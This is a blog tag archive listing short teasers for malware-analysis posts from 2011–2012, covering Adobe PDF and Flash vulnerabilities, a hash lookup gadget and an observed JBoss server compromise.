• Posts Tagged ‘analysis’

    Data Mining + Malware = Improved Analysis

    by  • April 30, 2012 • Uncategorized

    Over the past few weeks I have been talking with different analysts, programmers and RE folks about the future of malware analysis and how we combat changes in attacks. Ripping apart binaries and developing signatures based on TTPs doesn’t scale (...

    Read more →

    Adobe’s SWF Tools – CVE-2012-0754

    by  • March 6, 2012 • Uncategorized

    Yesterday Mila posted a Doc file exploiting the recent flash bug (CVE-2012-0754). Having not looked at it yet, I thought this would be a good way to test the new SWF tools Adobe released last night. I downloaded the files from the Contagio site he...

    Read more →

    Smart Hash Google Gadget

    by  • January 2, 2012 • Uncategorized

    Hashes and malware go together. When you get a new piece of malware the first thing you should do is create a hash and search for any information available on it. In some cases you may turn up nothing at all, but other times you may end up with a ...

    Read more →

    Analyzing CVE-2011-4369 – Part One

    by  • December 20, 2011 • Uncategorized

    Adobe pulled a fast one a couple days ago when they pushed out their most recent patch. In doing so they addressed CVE-2011-2462, but also mentioned another vulnerability that exploited the PRC format (also related to U3D). This additional vulnera...

    Read more →

    AESv3 CVE-2011-2462 Analysis

    by  • December 19, 2011 • Uncategorized

    Update: I added in some comments to the Origami library to show me the password used to encrypt the documents. The user encryption password used for the samples I have was a null password. If you would like the modified library, email me. In one o...

    Read more →

    Analysis of a Real JBOSS Hack

    by  • November 5, 2011 • Uncategorized

    Summary This is an analysis of a recent attack observed on a on a large enterprise network. The attackers compromised multiple servers via JBOSS JMX console vulnerabilities. With this access they were able to install tools for remote access and tr...

    Read more →